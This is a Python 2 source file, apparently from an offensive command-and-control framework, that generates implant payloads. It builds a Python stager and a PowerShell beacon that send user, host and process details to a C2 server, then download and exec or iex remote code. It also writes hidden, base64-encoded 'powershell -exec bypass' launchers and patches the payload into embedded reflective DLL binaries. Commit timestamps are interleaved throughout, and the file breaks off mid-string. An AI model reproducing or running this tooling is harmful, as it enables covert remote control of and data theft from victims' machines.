2018-07-23 08:55:15 +00:00
#!/usr/bin/env python
from Core import *
from Config import *
from Colours import *
2018-09-23 07:49:00 +00:00
import StringIO , gzip , io , base64 , subprocess , os , hashlib , re
2018-07-23 08:55:15 +00:00
class Payloads ( object ) :
quickstart = None
def __init__ ( self , KillDate , Key , HostnameIP , Domainfrontheader , Serverport , Proxyuser , Proxypass , Proxyurl , ImplantType , Proxy ,
Insecure , UserAgent , Referer , ConnectURL , BaseDirectory ) :
self . KillDate = KillDate
self . Key = Key
self . DomainFrontHeader = Domainfrontheader
self . HostnameIP = HostnameIP
self . Serverport = Serverport
self . Proxyuser = Proxyuser
self . Proxypass = Proxypass
self . Proxyurl = Proxyurl
self . Proxy = Proxy
self . ImplantType = ImplantType
self . Insecure = Insecure
self . UserAgent = UserAgent
self . Referer = Referer
self . ConnectURL = ConnectURL
self . BaseDirectory = BaseDirectory
2018-09-23 07:49:00 +00:00
if os . path . exists ( " %s aes.py " % PayloadsDirectory ) :
print " FOUND AES "
with open ( " %s aes.py " % PayloadsDirectory , ' rb ' ) as f :
content = f . read ( )
import re
m = re . search ( ' #KEY(.+?)#KEY ' , content ) ;
if m : keyfound = m . group ( 1 )
print keyfound
self . PythonHash = hashlib . sha512 ( content ) . hexdigest ( )
self . PythonKey = keyfound
else :
self . PythonKey = gen_key ( )
randomkey = self . PythonKey
with open ( " %s aes.py " % FilesDirectory , ' rb ' ) as f :
content = f . read ( )
aespy = content . replace ( " #REPLACEKEY# " , " #KEY %s #KEY " % randomkey )
filename = " %s aes.py " % ( self . BaseDirectory )
output_file = open ( filename , ' w ' )
output_file . write ( aespy )
output_file . close ( )
self . PythonHash = hashlib . sha512 ( aespy ) . hexdigest ( )
2018-09-04 20:54:03 +00:00
self . Python = """ import urllib2,os,sys,base64,ssl,socket,pwd,hashlib,time
kd = time . strptime ( " %s " , " %% d/ %% m/ %% Y " )
2018-09-04 12:59:50 +00:00
pyhash = " %s "
2018-08-14 20:17:54 +00:00
pykey = " %s "
key = " %s "
2018-09-23 07:49:00 +00:00
serverclean = " %s "
2018-08-14 20:17:54 +00:00
url = " %s "
url2 = " %s "
hh = " %s "
ua = " %s "
2018-09-04 20:54:03 +00:00
cstr = time . strftime ( " %% d/ %% m/ %% Y " , time . gmtime ( ) ) ; cstr = time . strptime ( cstr , " %% d/ %% m/ %% Y " )
2018-08-14 20:17:54 +00:00
ssl . _create_default_https_context = ssl . _create_unverified_context
if hh : r = urllib2 . Request ( url , headers = { ' Host ' : hh , ' User-agent ' : ua } )
else : r = urllib2 . Request ( url , headers = { ' User-agent ' : ua } )
2018-08-15 12:33:30 +00:00
res = urllib2 . urlopen ( r ) ; d = res . read ( ) ; c = d [ 1 : ] ; b = c . decode ( " hex " )
2018-09-04 12:59:50 +00:00
s = hashlib . sha512 ( b )
2018-09-04 20:54:03 +00:00
if pykey in b and pyhash == s . hexdigest ( ) and cstr < kd : exec ( b )
2018-08-14 20:17:54 +00:00
else : sys . exit ( 0 )
un = pwd . getpwuid ( os . getuid ( ) ) [ 0 ] ; pid = os . getpid ( )
is64 = sys . maxsize > 2 * * 32 ; arch = ( ' x64 ' if is64 == True else ' x86 ' )
hn = socket . gethostname ( ) ; o = urllib2 . build_opener ( )
encsid = encrypt ( key , ' %% s; %% s; %% s; %% s; %% s; ' % % ( un , hn , hn , arch , pid ) )
if hh : r = urllib2 . Request ( url2 , headers = { ' Host ' : hh , ' User-agent ' : ua , ' Cookie ' : ' SessionID= %% s ' % % encsid } )
else : r = urllib2 . Request ( url2 , headers = { ' User-agent ' : ua , ' Cookie ' : ' SessionID= %% s ' % % encsid } )
res = urllib2 . urlopen ( r ) ; html = res . read ( ) ; x = decrypt ( key , html ) . rstrip ( ' \\ 0 ' ) ; exec ( x )
2018-09-23 07:49:00 +00:00
""" % (self.KillDate,self.PythonHash,self.PythonKey,self.Key,(self.HostnameIP+ " : " +self.Serverport+ " / " ),(self.HostnameIP+ " : " +self.Serverport+ " / " +QuickCommand+ " _py " ),(self.HostnameIP+ " : " +self.Serverport+self.ConnectURL+ " ?m " ),self.DomainFrontHeader,self.UserAgent)
2018-07-23 08:55:15 +00:00
self . C2Core = """ %s
$ sc = " %s "
$ s = " %s "
function CAM ( $ key , $ IV ) {
$ a = New - Object - TypeName " System.Security.Cryptography.RijndaelManaged "
$ a . Mode = [ System . Security . Cryptography . CipherMode ] : : CBC
$ a . Padding = [ System . Security . Cryptography . PaddingMode ] : : Zeros
$ a . BlockSize = 128
$ a . KeySize = 256
if ( $ IV )
{
if ( $ IV . getType ( ) . Name - eq " String " )
{ $ a . IV = [ System . Convert ] : : FromBase64String ( $ IV ) }
else
{ $ a . IV = $ IV }
}
if ( $ key )
{
if ( $ key . getType ( ) . Name - eq " String " )
{ $ a . Key = [ System . Convert ] : : FromBase64String ( $ key ) }
else
{ $ a . Key = $ key }
}
$ a }
function ENC ( $ key , $ un ) {
$ b = [ System . Text . Encoding ] : : UTF8 . GetBytes ( $ un )
$ a = CAM $ key
$ e = $ a . CreateEncryptor ( )
$ f = $ e . TransformFinalBlock ( $ b , 0 , $ b . Length )
[ byte [ ] ] $ p = $ a . IV + $ f
[ System . Convert ] : : ToBase64String ( $ p )
}
function DEC ( $ key , $ enc ) {
$ b = [ System . Convert ] : : FromBase64String ( $ enc )
$ IV = $ b [ 0. .15 ]
$ a = CAM $ key $ IV
$ d = $ a . CreateDecryptor ( )
$ u = $ d . TransformFinalBlock ( $ b , 16 , $ b . Length - 16 )
[ System . Text . Encoding ] : : UTF8 . GetString ( $ u ) }
function Get - Webclient ( $ Cookie ) {
$ d = ( Get - Date - Format " dd/MM/yyyy " ) ;
$ d = [ datetime ] : : ParseExact ( $ d , " dd/MM/yyyy " , $ null ) ;
$ k = [ datetime ] : : ParseExact ( " %s " , " dd/MM/yyyy " , $ null ) ;
if ( $ k - lt $ d ) { exit }
$ username = " %s "
$ password = " %s "
$ proxyurl = " %s "
$ wc = New - Object System . Net . WebClient ;
% s
$ h = " %s "
if ( $ h - and ( ( $ psversiontable . CLRVersion . Major - gt 2 ) ) ) { $ wc . Headers . Add ( " Host " , $ h ) }
elseif ( $ h ) { $ script : s = " https://$($h) %s " ; $ script : sc = " https://$($h) " }
$ wc . Headers . Add ( " User-Agent " , " %s " )
$ wc . Headers . Add ( " Referer " , " %s " )
if ( $ proxyurl ) {
$ wp = New - Object System . Net . WebProxy ( $ proxyurl , $ true ) ;
if ( $ username - and $ password ) {
$ PSS = ConvertTo - SecureString $ password - AsPlainText - Force ;
$ getcreds = new - object system . management . automation . PSCredential $ username , $ PSS ;
$ wp . Credentials = $ getcreds ;
} else { $ wc . UseDefaultCredentials = $ true ; }
$ wc . Proxy = $ wp ; } else {
$ wc . UseDefaultCredentials = $ true ;
$ wc . Proxy . Credentials = $ wc . Credentials ;
} if ( $ cookie ) { $ wc . Headers . Add ( [ System . Net . HttpRequestHeader ] : : Cookie , " SessionID=$Cookie " ) }
$ wc }
function primer {
if ( $ env : username - eq " $($env:computername)$ " ) { $ u = " NT AUTHORITY \ SYSTEM " } else { $ u = $ env : username }
$ o = " $env:userdomain \ $u;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid; %s "
$ pp = enc - key % s - un $ o
$ primer = ( Get - Webclient - Cookie $ pp ) . downloadstring ( $ s )
$ p = dec - key % s - enc $ primer
if ( $ p - like " *key* " ) { $ p | iex }
}
try { primer } catch { }
Start - Sleep 300
try { primer } catch { }
Start - Sleep 600
try { primer } catch { } """ % (self.Insecure,(self.HostnameIP+ " : " +self.Serverport),
( self . HostnameIP + " : " + self . Serverport + self . ConnectURL + self . ImplantType ) , self . KillDate , self . Proxyuser , self . Proxypass ,
self . Proxyurl , self . Proxy , self . DomainFrontHeader , self . ConnectURL , self . UserAgent , self . Referer ,
( self . HostnameIP + " : " + self . Serverport ) , self . Key , self . Key )
def QuickstartLog ( self , txt ) :
if not self . quickstart : self . quickstart = ' '
print txt
self . quickstart + = txt + ' \n '
def WriteQuickstart ( self , path ) :
with open ( path , ' w ' ) as f :
f . write ( self . quickstart + Colours . END )
print ' '
print ' Quickstart written to ' + path
def CreateRawBase ( self , full = False ) :
out = StringIO . StringIO ( )
with gzip . GzipFile ( fileobj = out , mode = " w " ) as f :
f . write ( ( self . C2Core ) )
gzipdata = base64 . b64encode ( out . getvalue ( ) )
b64gzip = " IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String( ' %s ' ),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd() " % gzipdata
batfile = " powershell -exec bypass -Noninteractive -windowstyle hidden -e " + base64 . b64encode ( b64gzip . encode ( ' UTF-16LE ' ) )
if full :
return batfile
else :
return base64 . b64encode ( b64gzip . encode ( ' UTF-16LE ' ) )
def CreateRaw ( self , name = " " ) :
out = StringIO . StringIO ( )
with gzip . GzipFile ( fileobj = out , mode = " w " ) as f :
f . write ( ( self . C2Core ) )
gzipdata = base64 . b64encode ( out . getvalue ( ) )
b64gzip = " IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String( ' %s ' ),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd() " % gzipdata
filename = " %s %s payload.txt " % ( self . BaseDirectory , name )
output_file = open ( filename , ' w ' )
output_file . write ( self . C2Core )
output_file . close ( )
self . QuickstartLog ( " Raw Payload written to: %s " % filename )
batfile = " powershell -exec bypass -Noninteractive -windowstyle hidden -e " + base64 . b64encode ( b64gzip . encode ( ' UTF-16LE ' ) )
filename = " %s %s payload.bat " % ( self . BaseDirectory , name )
output_file = open ( filename , ' w ' )
output_file . write ( batfile )
output_file . close ( )
self . QuickstartLog ( " Batch Payload written to: %s " % filename )
def PatchDll ( self , filename , dll , offset , name ) :
filename = " %s %s " % ( self . BaseDirectory , filename )
output_file = open ( filename , ' wb ' )
output_file . write ( base64 . b64decode ( dll ) )
output_file . close ( )
out = StringIO . StringIO ( )
with gzip . GzipFile ( fileobj = out , mode = " w " ) as f :
f . write ( ( self . C2Core ) )
gzipdata = base64 . b64encode ( out . getvalue ( ) )
b64gzip = " sal a New-Object;iex(a IO.StreamReader((a System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String( \" %s \" ),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd() " % gzipdata
patchlen = 16000 - len ( ( base64 . b64encode ( b64gzip . encode ( ' UTF-16LE ' ) ) ) . encode ( ' UTF-16LE ' ) )
patch = ( base64 . b64encode ( b64gzip . encode ( ' UTF-16LE ' ) ) ) . encode ( ' UTF-16LE ' )
patch2 = " "
patch2 = patch2 . ljust ( patchlen , ' \x00 ' )
patch3 = " %s %s " % ( patch , patch2 )
f = open ( filename , " r+b " )
f . seek ( offset )
f . write ( patch3 )
f . close ( )
self . QuickstartLog ( " %s Payload written to: %s " % ( name , filename ) )
def CreateDlls ( self , name = " " ) :
# Load CLR "v2.0.50727"
self . QuickstartLog ( " " + Colours . END )
self . QuickstartLog ( " ReflectiveDLL that loads CLR v2.0.50727 - DLL Export (VoidFunc2) " + Colours . GREEN )
2018-08-01 08:31:59 +00:00
v2_86 = " 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
2018-07-23 08:55:15 +00:00
self . PatchDll ( " %s Posh_v2_x86.dll " % name , v2_86 , 0x00012F80 , " DLL " )
2018-08-01 08:31:59 +00:00
v2_64 = " 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
self . PatchDll ( " %s Posh_v2_x64.dll " % name , v2_64 , 0x00017500 , " DLL " )
2018-07-23 08:55:15 +00:00
# Load CLR "v4.0.30319"
self . QuickstartLog ( " " + Colours . END )
self . QuickstartLog ( " ReflectiveDLL that loads CLR v4.0.30319 - DLL Export (VoidFunc) " + Colours . GREEN )
2018-08-01 08:31:59 +00:00
v4_86 = " TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADAcg76hBNgqYQTYKmEE2CpMI+RqY0TYKkwj5Op8hNgqTCPkqmcE2CpVndjqJYTYKlWd2SolBNgqVZ3ZaigE2CpjWvzqYMTYKmEE2Gp4xNgqW93aaiGE2Cpb3dgqIUTYKlvd5+phRNgqW93YqiFE2CpUmljaIQTYKkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEFACteYFsAAAAAAAAAAOAAAiELAQ4MAMQAAADaAAAAAAAABh8AAAAQAAAA4AAAAAAAEAAQAAAAAgAABQABAAAAAAAFAAEAAAAAAADQAQAABAAAAAAAAAIAQAEAABAAABAAAAAAEAAAEAAAAAAAABAAAAAgOAEAZAAAAIQ4AQBQAAAAALABAOABAAAAAAAAAAAAAAAAAAAAAAAAAMABAKAPAACgKwEAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAsAQBAAAAAAAAAAAAAAAAA4AAATAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAATMIAAAAQAAAAxAAAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAEhfAAAA4AAAAGAAAADIAAAAAAAAAAAAAAAAAABAAABALmRhdGEAAADgZgAAAEABAABeAAAAKAEAAAAAAAAAAAAAAAAAQAAAwC5yc3JjAAAA4AEAAACwAQAAAgAAAIYBAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAKAPAAAAwAEAABAAAACIAQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA